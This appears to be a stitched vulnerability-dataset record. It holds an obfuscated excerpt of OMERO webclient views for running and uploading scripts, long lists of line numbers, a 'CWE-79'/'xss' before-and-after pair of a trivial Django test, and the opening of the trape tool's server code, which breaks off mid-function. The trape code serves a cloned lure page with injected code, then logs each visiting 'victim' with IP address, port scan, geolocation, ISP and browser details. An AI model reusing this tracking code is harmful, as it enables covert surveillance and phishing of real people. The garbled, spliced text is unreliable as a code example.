                    if isinstance(VAR_38, omero.model.IObject):
                        VAR_420.append(omero.rtypes.robject(VAR_38))
                    else:
                        VAR_420.append(VAR_38)
                VAR_50[VAR_312] = omero.rtypes.rlist(VAR_420)
            else:
                VAR_375 = VAR_2.POST[VAR_312]
                if len(VAR_375) == 0:
                    continue
                try:
                    VAR_50[VAR_312] = VAR_336(VAR_375)
                except Exception:
                    VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_312, VAR_375))
                    continue
    # run in the group of the first target object
    if "IDs" in VAR_50 and "Data_Type" in VAR_50:
        VAR_337 = VAR_6.SERVICE_OPTS.getOmeroGroup()
        VAR_6.SERVICE_OPTS.setOmeroGroup("-1")
        try:
            VAR_380 = VAR_6.getObject(
                VAR_50["Data_Type"].val, unwrap(VAR_50["IDs"])[0]
            )
            VAR_381 = VAR_380.getDetails().group.id.val
            VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_381)
        except Exception:
            VAR_0.debug(traceback.format_exc())
            VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_337)
    try:
        VAR_0.debug("Running script %s with " "params %s" % (VAR_43, VAR_50))
    except Exception:
        pass
    VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43)
    return JsonResponse(VAR_174)
@login_required(isAdmin=True)
@render_response()
def FUNC_77(VAR_2, VAR_6=None, **VAR_7):
    """Upload (or replace) an official server script (admin only).

    GET renders the upload form; POST reads 'script_path' and the uploaded
    'script_file', replacing an existing script at that path or uploading a
    new one. Returns a status message and the script's file id.

    Fix: the path variable was referenced by an undefined name
    (`script_path`), raising NameError; now uses VAR_236 consistently.
    """
    if VAR_2.method != "POST":
        return {"template": "webclient/VAR_203/upload_script.html"}
    VAR_236 = VAR_2.POST.get("script_path")
    VAR_237 = VAR_2.FILES["script_file"]
    VAR_237.seek(0)
    VAR_238 = VAR_237.read().decode("utf-8")
    if not VAR_236.endswith("/"):
        VAR_236 = VAR_236 + "/"
    VAR_236 = VAR_236 + VAR_237.name
    VAR_202 = VAR_6.getScriptService()
    VAR_239 = VAR_202.getScriptID(VAR_236)
    try:
        if VAR_239 > 0:
            # existing script at this path: edit it in place
            VAR_173 = OriginalFileI(VAR_239, False)
            VAR_202.editScript(VAR_173, VAR_238)
            VAR_382 = "Script Replaced: %s" % VAR_237.name
        else:
            VAR_239 = VAR_202.uploadOfficialScript(VAR_236, VAR_238)
            VAR_382 = "Script Uploaded: %s" % VAR_237.name
    except omero.ValidationException as ex:
        VAR_382 = VAR_347(ex)
    return {"Message": VAR_382, "script_id": VAR_239}
@require_POST
@login_required()
def FUNC_78(VAR_2, VAR_26, VAR_6=None, **VAR_7):
    """Launch the Batch_Image_Export script to build an OME-TIFF for one image."""
    script_service = VAR_6.getScriptService()
    script_id = script_service.getScriptID(
        "/omero/export_scripts/Batch_Image_Export.py"
    )
    image = VAR_6.getObject("Image", VAR_26)
    if image is not None:
        # run in the image's own group
        group_id = image.getDetails().group.id.val
        VAR_6.SERVICE_OPTS.setOmeroGroup(group_id)
    image_ids = [VAR_241(VAR_26)]
    script_inputs = {
        "Data_Type": wrap("Image"),
        "IDs": rlist([rlong(iid) for iid in image_ids]),
        "Format": wrap("OME-TIFF"),
    }
    launch_result = FUNC_79(
        VAR_2, VAR_6, script_id, script_inputs, VAR_43="Create OME-TIFF"
    )
    return JsonResponse(launch_result)
def FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script"):
    """Run a script and register it in the session 'callback' job registry.

    Returns {'jobId', 'status'} on success, or {'status', 'error'} when the
    launch fails ('no processor available' is reported without an error
    traceback so the UI can retry).

    Fix: on failure the message was re-read from `x.message`, which does
    not exist on Python 3 exceptions; the safely-computed VAR_382 is now
    used throughout.
    """
    VAR_2.session.modified = True
    VAR_202 = VAR_6.getScriptService()
    try:
        VAR_84 = VAR_202.runScript(VAR_49, VAR_50, None, VAR_6.SERVICE_OPTS)
        VAR_198 = VAR_347(VAR_84)
        VAR_315 = "in progress"
        VAR_2.session["callback"][VAR_198] = {
            "job_type": "script",
            "job_name": VAR_43,
            "start_time": datetime.datetime.now(),
            "status": VAR_315,
        }
        VAR_2.session.modified = True
    except Exception as x:
        VAR_198 = VAR_347(time())  # E.g. 1312803670.6076391
        VAR_382 = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
        if VAR_382 and VAR_382.startswith("No processor available"):
            VAR_0.info(traceback.format_exc())
            VAR_57 = "No Processor Available"
            VAR_315 = "no processor available"
            VAR_382 = ""  # template displays message and link
        else:
            if isinstance(x, omero.ValidationException):
                VAR_0.debug(VAR_382)
            else:
                VAR_0.error(traceback.format_exc())
            VAR_57 = traceback.format_exc()
            VAR_315 = "failed"
        VAR_2.session["callback"][VAR_198] = {
            "job_type": "script",
            "job_name": VAR_43,
            "start_time": datetime.datetime.now(),
            "status": VAR_315,
            "Message": VAR_382,
            "error": VAR_57,
        }
        return {"status": VAR_315, "error": VAR_57}
    return {"jobId": VAR_198, "status": VAR_315}
@login_required()
@render_response()
def FUNC_80(VAR_2, VAR_26, VAR_6=None, **VAR_7):
    """Return info about the most recent OME-TIFF generated for an image.

    Looks up annotation links in the OME-TIFF namespace and returns the
    newest one's creation date, age, file-annotation id and download URL
    ({} when none exist). Rendered as JSON by the decorator.

    Fixes: list.sort was called with invalid keywords (now key=/reverse=),
    and the namespace kwarg was corrupted (now ns= per the gateway API —
    confirm against BlitzGateway.getAnnotationLinks).
    """
    VAR_240 = list(
        VAR_6.getAnnotationLinks(
            "Image", [VAR_26], ns=omero.constants.namespaces.NSOMETIFF
        )
    )
    VAR_172 = {}
    if len(VAR_240) > 0:
        # newest link first
        VAR_240.sort(key=lambda x: x.getId(), reverse=True)
        VAR_338 = VAR_240[0]
        VAR_293 = VAR_338.creationEventDate()
        VAR_34 = VAR_338.getChild().getId()
        from omeroweb.webgateway.templatetags.common_filters import ago

        VAR_31 = VAR_352("download_annotation", args=[VAR_34])
        VAR_172 = {
            "created": VAR_347(VAR_293),
            "ago": ago(VAR_293),
            "id": VAR_34,
            "download": VAR_31,
        }
    return VAR_172  # will be returned as json by the decorator
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
24,
39,
41,
44,
48,
50,
67,
68,
80,
85,
87,
91,
93,
108,
125,
127,
132,
134,
136,
137,
138,
140,
141,
146,
155,
156,
160,
161,
167,
168,
173,
178,
179,
189,
190,
191,
192,
193,
194,
199,
209,
211,
212,
213,
214,
215,
216,
229,
232,
238,
245,
246,
247,
248,
249,
257,
260,
262,
263,
275,
281,
302,
305,
311,
329,
331,
332,
336,
337,
338,
340,
341,
351,
356,
357,
375,
376,
396,
397,
404,
418,
419,
420,
422,
432,
440,
442,
443,
445,
446,
451,
452,
454,
455,
457,
462,
463,
465,
466,
473,
474,
480,
481,
482,
486,
487,
489,
493,
494,
498,
504,
513,
516,
521,
523,
527,
529,
530,
539,
563,
565,
566,
571,
572,
582,
595,
598,
606,
607,
610,
617,
619,
629,
631,
632,
635,
640,
642,
646,
653,
660,
661,
664,
672,
673,
674,
675,
676,
677,
678,
681,
684,
692,
693,
702,
703,
711,
712,
721,
732,
748,
750,
751,
754,
762,
765,
767,
777,
779,
780,
790,
792,
805,
808,
809,
810,
811,
812,
814,
816,
836,
838,
839,
842,
850,
853,
855,
865,
867,
868,
871,
878,
879,
880,
883,
885,
895,
897,
898,
906,
907,
908,
924,
927,
929,
930,
941,
943,
950,
951,
956,
957,
990,
991,
1002,
1003,
1015,
1019,
1021,
1026,
1027,
1035,
1037,
1038,
1039,
1040,
1049,
1055,
1061,
1063,
1076,
1078,
1085,
1086,
1093,
1095,
1096,
1102,
1104,
1105,
1106,
1121,
1125,
1126,
1130,
1138,
1139,
1141,
1143,
1144,
1151,
1160,
1165,
1177,
1179,
1180,
1186,
1190,
1194,
1203,
1204,
1215,
1218,
1236,
1237,
1244,
1245,
1253,
1265,
1267,
1281,
1282,
1298,
1300,
1301,
1304,
1309,
1311,
1319,
1324,
1331,
1333,
1334,
1337,
1348,
1351,
1366,
1368,
1369,
1372,
1380,
1381,
1382,
1383,
1384,
1386,
1390,
1400,
1402,
1403,
1411,
1412,
1414,
1415,
1416,
1421,
1426,
1427,
1429,
1431,
1432,
1440,
1441,
1449,
1457,
1461,
1462,
1474,
1487,
1493,
1500,
1501,
1503,
1507,
1508,
1509,
1514,
1522,
1523,
1530,
1532,
1534,
1535,
1540,
1541,
1544,
1548,
1551,
1552,
1560,
1562,
1570,
1574,
1579,
1591,
1592,
1595,
1596,
1597,
1608,
1609,
1610,
1638,
1640,
1642,
1651,
1652,
1662,
1663,
1665,
1667,
1668,
1689,
1690,
1691,
1702,
1714,
1737,
1744,
1749,
1750,
1758,
1759,
1761,
1767,
1771,
1775,
1779,
1780,
1804,
1811,
1812,
1822,
1826,
1827,
1848,
1859,
1863,
1864,
1868,
1892,
1917,
1933,
1959,
1960,
1971,
1985,
1987,
1992,
1995,
2015,
2027,
2030,
2060,
2067,
2082,
2103,
2104,
2119,
2120,
2124,
2128,
2140,
2143,
2144,
2145,
2146,
2147,
2148,
2149,
2150,
2151,
2152,
2153,
2154,
2155,
2156,
2157,
2158,
2159,
2160,
2161,
2217,
2218,
2235,
2236,
2245,
2247,
2248,
2265,
2266,
2276,
2289,
2314,
2315,
2337,
2338,
2339,
2344,
2348,
2349,
2350,
2372,
2381,
2388,
2389,
2394,
2396,
2398,
2401,
2406,
2418,
2425,
2426,
2437,
2438,
2442,
2443,
2445,
2446,
2454,
2457,
2471,
2472,
2473,
2479,
2480,
2483,
2496,
2503,
2504,
2510,
2512,
2513,
2521,
2526,
2528,
2529,
2530,
2531,
2537,
2540,
2543,
2544,
2548,
2552,
2562,
2571,
2581,
2589,
2591,
2592,
2599,
2607,
2612,
2617,
2619,
2622,
2624,
2626,
2628,
2630,
2632,
2633,
2641,
2645,
2646,
2647,
2650,
2652,
2653,
2654,
2659,
2660,
2661,
2672,
2675,
2679,
2680,
2682,
2690,
2692,
2704,
2705,
2706,
2708,
2719,
2721,
2726,
2728,
2729,
2731,
2749,
2762,
2764,
2776,
2777,
2795,
2797,
2812,
2813,
2821,
2834,
2861,
2864,
2865,
2870,
2877,
2889,
2890,
2913,
2915,
2938,
2954,
2973,
2986,
3008,
3017,
3040,
3041,
3042,
3050,
3064,
3089,
3131,
3138,
3139,
3146,
3147,
3149,
3155,
3163,
3169,
3170,
3176,
3182,
3187,
3196,
3197,
3202,
3207,
3210,
3211,
3215,
3224,
3227,
3232,
3235,
3240,
3241,
3244,
3245,
3255,
3256,
3267,
3268,
3272,
3276,
3284,
3290,
3292,
3293,
3302,
3311,
3312,
3316,
3320,
3322,
3325,
3329,
3335,
3336,
3345,
3356,
3359,
3361,
3365,
3366,
3375,
3377,
3380,
3383,
3384,
3390,
3406,
3408,
3413,
3425,
3426,
3435,
3438,
3447,
3449,
3452,
3453,
3458,
3461,
3463,
3464,
3466,
3472,
3476,
3477,
3487,
3488,
3489,
3497,
3509,
3510,
3511,
3512,
3517,
3518,
3530,
3535,
3536,
3537,
3560,
3565,
3583,
3586,
3587,
3591,
3595,
3597,
3598,
3609,
3610,
3655,
3656,
3660,
3715,
3716,
3773,
3774,
3776,
3795,
3799,
3812,
3818,
3824,
3825,
3832,
3844,
3845,
3847,
3850,
3858,
3859,
3860,
3863,
3864,
3866,
3867,
3877,
3881,
3882,
3883,
3895,
3905,
3908,
3909,
3917,
3919,
3937,
3938,
3939,
3940,
3941,
3942,
3948,
3949,
3950,
3951,
3952,
3953,
3960,
3963,
3964,
3965,
3966,
3972,
3978,
3979,
3994,
3995,
3996,
3997,
3998,
4005,
4011,
4012,
4013,
4018,
4024,
4026,
4027,
4030,
4032,
4033,
4041,
4053,
4055,
4063,
4094,
4098,
4099,
4100,
4103,
4104,
4108,
4114,
4115,
4127,
4140,
4141,
4142,
4145,
4157,
4159,
4165,
4166,
4173,
4177,
4188,
4198,
4202,
4204,
4213,
4217,
4231,
4232,
4237,
4241,
4260,
4288,
4292,
4293,
4295,
4301,
4315,
4320,
4324,
4325,
4342,
4352,
4358,
4360,
4361,
4369,
4372,
4379,
4380,
4391,
4392,
4403,
4404,
4416,
4419,
4420,
4421,
4422,
4423,
4424,
4436,
4437,
4454,
4455,
4456,
4457,
4464,
4468,
4469,
4476,
4491,
4497,
4498,
4499,
4500,
4504,
4509,
4523,
4526,
4527,
4528,
4529,
4530,
4531,
4533,
4541,
4549,
4550,
4555,
4556,
4568,
4576,
4577,
4587,
4592,
4599,
4604,
4605,
4615,
4617,
4622,
4626,
4627,
4630,
4631,
4652,
4653,
4654,
4655,
4661,
4672,
4673,
4674,
4675,
4676,
4677,
4678,
4679,
4689,
4690,
4692,
4693,
4703,
4711,
4715,
4734,
4736,
4737,
4744,
4746,
4748,
4753,
4760,
4762,
4763,
4771,
4775,
4779,
4780,
4781,
4786,
4793,
4794,
4805,
4815,
4816,
4819,
4820,
4827,
4828,
4832,
4842,
4843,
4853,
4854,
4855,
4867,
4869,
4871,
4877,
4878,
4883,
4886,
4887,
4892,
4896,
4897,
4900,
4911,
4913,
4914,
4924,
4927,
4940,
4941,
4952,
4964,
4967,
4973,
4981,
4991,
4993,
4994,
5002,
5010,
5016,
5025,
20,
21,
22,
23,
143,
144,
145,
146,
147,
148,
149,
170,
171,
172,
173,
174,
175,
176,
181,
182,
183,
184,
185,
218,
219,
220,
221,
222,
223,
224,
225,
226,
227,
228,
335,
344,
345,
346,
347,
348,
349,
359,
360,
361,
362,
363,
378,
379,
380,
381,
400,
401,
402,
403,
423,
424,
425,
426,
427,
428,
429,
430,
576,
577,
578,
579,
580,
581,
783,
784,
785,
786,
787,
788,
789,
790,
791,
900,
953,
993,
994,
995,
1006,
1007,
1008,
1009,
1010,
1029,
1030,
1031,
1032,
1033,
1034,
1098,
1099,
1100,
1101,
1147,
1148,
1149,
1150,
1151,
1152,
1153,
1183,
1184,
1185,
1186,
1187,
1188,
1189,
1190,
1191,
1192,
1193,
1247,
1248,
1249,
1250,
1251,
1252,
1303,
1407,
1408,
1409,
1410,
1466,
1467,
1468,
1469,
1470,
1471,
1472,
1473,
1539,
1556,
1557,
1558,
1656,
1657,
1658,
1659,
1660,
1661,
1754,
1755,
1756,
1816,
1817,
1818,
1819,
1820,
1833,
1834,
1835,
1836,
2163,
2164,
2165,
2166,
2167,
2220,
2221,
2222,
2240,
2241,
2242,
2243,
2244,
2319,
2320,
2321,
2322,
2323,
2324,
2430,
2431,
2432,
2450,
2451,
2452,
2453,
2517,
2518,
2519,
2520,
2596,
2597,
2598,
2637,
2638,
2639,
2640,
2782,
2783,
2784,
2819,
2820,
2821,
2822,
2823,
2824,
2825,
2826,
2827,
2828,
2829,
2830,
2831,
2832,
3142,
3143,
3144,
3145,
3174,
3175,
3176,
3177,
3178,
3179,
3180,
3181,
3182,
3183,
3184,
3185,
3186,
3296,
3315,
3340,
3341,
3342,
3343,
3344,
3430,
3431,
3432,
3433,
3434,
3457,
3479,
3480,
3481,
3482,
3483,
3484,
3485,
3514,
3522,
3523,
3524,
3525,
3526,
3527,
3528,
3529,
3912,
3913,
3914,
3915,
3916,
3945,
3956,
3970,
3971,
3972,
3973,
3974,
3975,
4037,
4038,
4039,
4170,
4171,
4172,
4329,
4330,
4331,
4332,
4333,
4365,
4366,
4367,
4368,
4560,
4580,
4581,
4582,
4583,
4584,
4696,
4697,
4698,
4699,
4700,
4740,
4741,
4742,
4882,
4918,
4919,
4920,
4921,
4922,
4923,
4943,
4944,
4945,
4946,
4947,
4998,
4999,
5000,
5001,
234,
235,
236,
240,
241,
242,
243,
244,
277,
278,
279,
280,
281,
282,
283,
284,
285
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
24,
40,
42,
45,
49,
51,
68,
69,
81,
86,
88,
92,
94,
109,
126,
128,
133,
135,
137,
138,
139,
141,
142,
147,
156,
157,
161,
162,
168,
169,
174,
179,
180,
190,
191,
192,
193,
194,
195,
200,
210,
212,
213,
214,
215,
216,
217,
230,
233,
239,
246,
247,
248,
249,
250,
258,
261,
263,
264,
276,
282,
303,
306,
312,
330,
332,
333,
337,
338,
339,
341,
342,
352,
357,
358,
376,
377,
397,
398,
405,
419,
420,
421,
423,
433,
441,
443,
444,
446,
447,
452,
453,
455,
456,
458,
463,
464,
466,
467,
474,
475,
481,
482,
483,
487,
488,
490,
494,
495,
499,
505,
514,
517,
522,
524,
528,
530,
531,
540,
564,
566,
567,
572,
573,
583,
596,
599,
607,
608,
611,
618,
620,
630,
632,
633,
636,
641,
643,
647,
654,
661,
662,
665,
673,
674,
675,
676,
677,
678,
679,
682,
685,
693,
694,
703,
704,
712,
713,
722,
733,
749,
751,
752,
755,
763,
766,
768,
778,
780,
781,
791,
793,
806,
809,
810,
811,
812,
813,
815,
817,
837,
839,
840,
843,
851,
854,
856,
866,
868,
869,
872,
879,
880,
881,
884,
886,
896,
898,
899,
907,
908,
909,
925,
928,
930,
931,
942,
944,
951,
952,
957,
958,
991,
992,
1003,
1004,
1016,
1020,
1022,
1027,
1028,
1036,
1038,
1039,
1040,
1041,
1050,
1056,
1062,
1064,
1077,
1079,
1086,
1087,
1094,
1096,
1097,
1103,
1105,
1106,
1107,
1122,
1126,
1127,
1131,
1139,
1140,
1142,
1144,
1145,
1152,
1161,
1166,
1178,
1180,
1181,
1187,
1191,
1195,
1204,
1205,
1216,
1219,
1237,
1238,
1245,
1246,
1254,
1266,
1268,
1282,
1283,
1299,
1301,
1302,
1305,
1310,
1312,
1320,
1325,
1332,
1334,
1335,
1338,
1349,
1352,
1367,
1369,
1370,
1373,
1381,
1382,
1383,
1384,
1385,
1387,
1391,
1401,
1403,
1404,
1412,
1413,
1415,
1416,
1417,
1422,
1427,
1428,
1430,
1432,
1433,
1441,
1442,
1450,
1458,
1462,
1463,
1475,
1488,
1494,
1501,
1502,
1504,
1508,
1509,
1510,
1515,
1523,
1524,
1531,
1533,
1535,
1536,
1541,
1542,
1545,
1549,
1552,
1553,
1561,
1563,
1571,
1575,
1580,
1592,
1593,
1596,
1597,
1598,
1609,
1610,
1611,
1639,
1641,
1643,
1652,
1653,
1663,
1664,
1666,
1668,
1669,
1690,
1691,
1692,
1703,
1715,
1738,
1745,
1750,
1751,
1759,
1760,
1762,
1768,
1772,
1776,
1780,
1781,
1805,
1812,
1813,
1823,
1827,
1828,
1849,
1860,
1864,
1865,
1869,
1893,
1918,
1934,
1960,
1961,
1972,
1986,
1988,
1993,
1996,
2016,
2028,
2031,
2061,
2068,
2083,
2104,
2105,
2120,
2121,
2125,
2129,
2141,
2144,
2145,
2146,
2147,
2148,
2149,
2150,
2151,
2152,
2153,
2154,
2155,
2156,
2157,
2158,
2159,
2160,
2161,
2162,
2218,
2219,
2236,
2237,
2246,
2248,
2249,
2266,
2267,
2277,
2290,
2315,
2316,
2338,
2339,
2340,
2345,
2349,
2350,
2351,
2373,
2382,
2389,
2390,
2395,
2397,
2399,
2402,
2407,
2419,
2426,
2427,
2438,
2439,
2443,
2444,
2446,
2447,
2455,
2458,
2472,
2473,
2474,
2480,
2481,
2484,
2497,
2504,
2505,
2511,
2513,
2514,
2522,
2527,
2529,
2530,
2531,
2532,
2538,
2541,
2544,
2545,
2549,
2553,
2563,
2572,
2582,
2590,
2592,
2593,
2600,
2608,
2613,
2618,
2620,
2623,
2625,
2627,
2629,
2631,
2633,
2634,
2642,
2646,
2647,
2648,
2651,
2653,
2654,
2655,
2660,
2661,
2662,
2673,
2676,
2680,
2681,
2683,
2691,
2693,
2705,
2706,
2707,
2709,
2720,
2722,
2727,
2729,
2730,
2732,
2750,
2763,
2765,
2777,
2778,
2796,
2798,
2813,
2814,
2822,
2835,
2862,
2865,
2866,
2871,
2878,
2890,
2891,
2914,
2916,
2939,
2955,
2974,
2987,
3009,
3018,
3041,
3042,
3043,
3051,
3065,
3090,
3132,
3139,
3140,
3147,
3148,
3150,
3156,
3164,
3170,
3171,
3177,
3183,
3188,
3197,
3198,
3203,
3208,
3211,
3212,
3216,
3225,
3228,
3233,
3236,
3241,
3242,
3245,
3246,
3256,
3257,
3268,
3269,
3273,
3277,
3285,
3291,
3293,
3294,
3303,
3312,
3313,
3317,
3321,
3323,
3326,
3330,
3336,
3337,
3346,
3357,
3360,
3362,
3366,
3367,
3376,
3378,
3381,
3384,
3385,
3391,
3407,
3409,
3414,
3426,
3427,
3436,
3439,
3448,
3450,
3453,
3454,
3459,
3462,
3464,
3465,
3467,
3473,
3477,
3478,
3488,
3489,
3490,
3498,
3510,
3511,
3512,
3513,
3518,
3519,
3531,
3536,
3537,
3538,
3561,
3566,
3584,
3587,
3588,
3592,
3596,
3598,
3599,
3610,
3611,
3656,
3657,
3661,
3716,
3717,
3774,
3775,
3777,
3796,
3800,
3813,
3819,
3825,
3826,
3833,
3845,
3846,
3848,
3851,
3859,
3860,
3861,
3864,
3865,
3867,
3868,
3878,
3882,
3883,
3884,
3896,
3906,
3909,
3910,
3918,
3920,
3938,
3939,
3940,
3941,
3942,
3943,
3949,
3950,
3951,
3952,
3953,
3954,
3961,
3964,
3965,
3966,
3967,
3973,
3979,
3980,
3995,
3996,
3997,
3998,
3999,
4006,
4012,
4013,
4014,
4019,
4025,
4027,
4028,
4031,
4033,
4034,
4042,
4054,
4056,
4064,
4095,
4099,
4100,
4101,
4104,
4105,
4109,
4115,
4116,
4128,
4141,
4142,
4143,
4146,
4158,
4160,
4166,
4167,
4174,
4178,
4189,
4199,
4203,
4205,
4214,
4218,
4232,
4233,
4238,
4242,
4261,
4289,
4293,
4294,
4296,
4302,
4316,
4321,
4325,
4326,
4343,
4353,
4359,
4361,
4362,
4370,
4373,
4380,
4381,
4392,
4393,
4404,
4405,
4417,
4420,
4421,
4422,
4423,
4424,
4425,
4437,
4438,
4455,
4456,
4457,
4458,
4465,
4469,
4470,
4477,
4492,
4498,
4499,
4500,
4501,
4505,
4510,
4524,
4527,
4528,
4529,
4530,
4531,
4532,
4534,
4542,
4550,
4551,
4556,
4557,
4569,
4577,
4578,
4588,
4593,
4600,
4605,
4606,
4616,
4618,
4623,
4627,
4628,
4631,
4632,
4653,
4654,
4655,
4656,
4662,
4673,
4674,
4675,
4676,
4677,
4678,
4679,
4680,
4690,
4691,
4693,
4694,
4704,
4712,
4716,
4735,
4737,
4738,
4745,
4747,
4749,
4754,
4761,
4763,
4764,
4772,
4776,
4780,
4781,
4782,
4787,
4794,
4795,
4806,
4816,
4817,
4820,
4821,
4828,
4829,
4833,
4843,
4844,
4854,
4855,
4856,
4868,
4870,
4872,
4878,
4879,
4884,
4887,
4888,
4893,
4897,
4898,
4901,
4912,
4914,
4915,
4925,
4928,
4941,
4942,
4953,
4965,
4968,
4974,
4982,
4992,
4994,
4995,
5003,
5011,
5017,
5026,
20,
21,
22,
23,
144,
145,
146,
147,
148,
149,
150,
171,
172,
173,
174,
175,
176,
177,
182,
183,
184,
185,
186,
219,
220,
221,
222,
223,
224,
225,
226,
227,
228,
229,
336,
345,
346,
347,
348,
349,
350,
360,
361,
362,
363,
364,
379,
380,
381,
382,
401,
402,
403,
404,
424,
425,
426,
427,
428,
429,
430,
431,
577,
578,
579,
580,
581,
582,
784,
785,
786,
787,
788,
789,
790,
791,
792,
901,
954,
994,
995,
996,
1007,
1008,
1009,
1010,
1011,
1030,
1031,
1032,
1033,
1034,
1035,
1099,
1100,
1101,
1102,
1148,
1149,
1150,
1151,
1152,
1153,
1154,
1184,
1185,
1186,
1187,
1188,
1189,
1190,
1191,
1192,
1193,
1194,
1248,
1249,
1250,
1251,
1252,
1253,
1304,
1408,
1409,
1410,
1411,
1467,
1468,
1469,
1470,
1471,
1472,
1473,
1474,
1540,
1557,
1558,
1559,
1657,
1658,
1659,
1660,
1661,
1662,
1755,
1756,
1757,
1817,
1818,
1819,
1820,
1821,
1834,
1835,
1836,
1837,
2164,
2165,
2166,
2167,
2168,
2221,
2222,
2223,
2241,
2242,
2243,
2244,
2245,
2320,
2321,
2322,
2323,
2324,
2325,
2431,
2432,
2433,
2451,
2452,
2453,
2454,
2518,
2519,
2520,
2521,
2597,
2598,
2599,
2638,
2639,
2640,
2641,
2783,
2784,
2785,
2820,
2821,
2822,
2823,
2824,
2825,
2826,
2827,
2828,
2829,
2830,
2831,
2832,
2833,
3143,
3144,
3145,
3146,
3175,
3176,
3177,
3178,
3179,
3180,
3181,
3182,
3183,
3184,
3185,
3186,
3187,
3297,
3316,
3341,
3342,
3343,
3344,
3345,
3431,
3432,
3433,
3434,
3435,
3458,
3480,
3481,
3482,
3483,
3484,
3485,
3486,
3515,
3523,
3524,
3525,
3526,
3527,
3528,
3529,
3530,
3913,
3914,
3915,
3916,
3917,
3946,
3957,
3971,
3972,
3973,
3974,
3975,
3976,
4038,
4039,
4040,
4171,
4172,
4173,
4330,
4331,
4332,
4333,
4334,
4366,
4367,
4368,
4369,
4561,
4581,
4582,
4583,
4584,
4585,
4697,
4698,
4699,
4700,
4701,
4741,
4742,
4743,
4883,
4919,
4920,
4921,
4922,
4923,
4924,
4944,
4945,
4946,
4947,
4948,
4999,
5000,
5001,
5002,
235,
236,
237,
241,
242,
243,
244,
245,
278,
279,
280,
281,
282,
283,
284,
285,
286
] |
1CWE-79
| import orjson
from tests.views.message.utils import post_and_get_response
def test_message_nested_sync_input(client):
data = {"dictionary": {"name": "test"}}
action_queue = [
{"payload": {"name": "dictionary.name", "value": "test1"}, "type": "syncInput",}
]
response = post_and_get_response(
client,
url="/message/tests.views.fake_components.FakeComponent",
data=data,
action_queue=action_queue,
)
assert not response["errors"]
assert response["data"].get("dictionary") == {"name": "test1"}
| from tests.views.message.utils import post_and_get_response
def test_message_nested_sync_input(client):
data = {"dictionary": {"name": "test"}}
action_queue = [
{"payload": {"name": "dictionary.name", "value": "test1"}, "type": "syncInput",}
]
response = post_and_get_response(
client,
url="/message/tests.views.fake_components.FakeComponent",
data=data,
action_queue=action_queue,
)
assert not response["errors"]
assert response["data"].get("dictionary") == {"name": "test1"}
| xss | {
"code": [
"import orjson"
],
"line_no": [
1
]
} | {
"code": [],
"line_no": []
} | import orjson
from tests.views.message.utils import post_and_get_response
def FUNC_0(VAR_0):
VAR_1 = {"dictionary": {"name": "test"}}
VAR_2 = [
{"payload": {"name": "dictionary.name", "value": "test1"}, "type": "syncInput",}
]
VAR_3 = post_and_get_response(
VAR_0,
url="/message/tests.views.fake_components.FakeComponent",
VAR_1=data,
VAR_2=action_queue,
)
assert not VAR_3["errors"]
assert VAR_3["data"].get("dictionary") == {"name": "test1"}
| from tests.views.message.utils import post_and_get_response
def FUNC_0(VAR_0):
VAR_1 = {"dictionary": {"name": "test"}}
VAR_2 = [
{"payload": {"name": "dictionary.name", "value": "test1"}, "type": "syncInput",}
]
VAR_3 = post_and_get_response(
VAR_0,
url="/message/tests.views.fake_components.FakeComponent",
VAR_1=data,
VAR_2=action_queue,
)
assert not VAR_3["errors"]
assert VAR_3["data"].get("dictionary") == {"name": "test1"}
| [
2,
4,
5,
17,
20
] | [
2,
3,
15,
18
] |
1CWE-79
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/boxug/trape
#
# Copyright 2017 by boxug / <hey@boxug.com>
#**
import time
import urllib2
from flask import Flask, render_template, session, request, json
from core.victim_objects import *
import core.stats
from core.utils import utils
from core.db import Database
# Main parts, to generate relationships among others
trape = core.stats.trape
app = core.stats.app
# call database
db = Database()
class victim_server(object):
@app.route("/" + trape.victim_path)
def homeVictim():
opener = urllib2.build_opener()
headers = victim_headers()
opener.addheaders = headers
html = victim_inject_code(opener.open(trape.url_to_clone).read(), 'lure')
return html
@app.route("/register", methods=["POST"])
def register():
vId = request.form['vId']
if vId == '':
vId = utils.generateToken(5)
victimConnect = victim(vId, request.environ['REMOTE_ADDR'], request.user_agent.platform, request.user_agent.browser, request.user_agent.version, utils.portScanner(request.environ['REMOTE_ADDR']), request.form['cpu'], time.strftime("%Y-%m-%d - %H:%M:%S"))
victimGeo = victim_geo(vId, 'city', request.form['countryCode'], request.form['country'], request.form['query'], request.form['lat'], request.form['lon'], request.form['org'], request.form['region'], request.form['regionName'], request.form['timezone'], request.form['zip'], request.form['isp'], str(request.user_agent))
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " A victim has been connected from " + utils.Color['blue'] + victimGeo.ip + utils.Color['white'] + ' with the following identifier: ' + utils.Color['green'] + vId + utils.Color['white'])
cant = int(db.sentences_victim('count_times', vId, 3, 0))
db.sentences_victim('insert_click', [vId, trape.url_to_clone, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
db.sentences_victim('delete_networks', [vId], 2)
if cant > 0:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his " + str(cant + 1) + " time")
db.sentences_victim('update_victim', [victimConnect, vId, time.time()], 2)
db.sentences_victim('update_victim_geo', [victimGeo, vId], 2)
else:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his first time")
db.sentences_victim('insert_victim', [victimConnect, vId, time.time()], 2)
db.sentences_victim('insert_victim_geo', [victimGeo, vId], 2)
return json.dumps({'status' : 'OK', 'vId' : vId});
@app.route("/nr", methods=["POST"])
def networkRegister():
vId = request.form['vId']
vIp = request.form['ip']
vnetwork = request.form['red']
if vId == '':
vId = utils.generateToken(5)
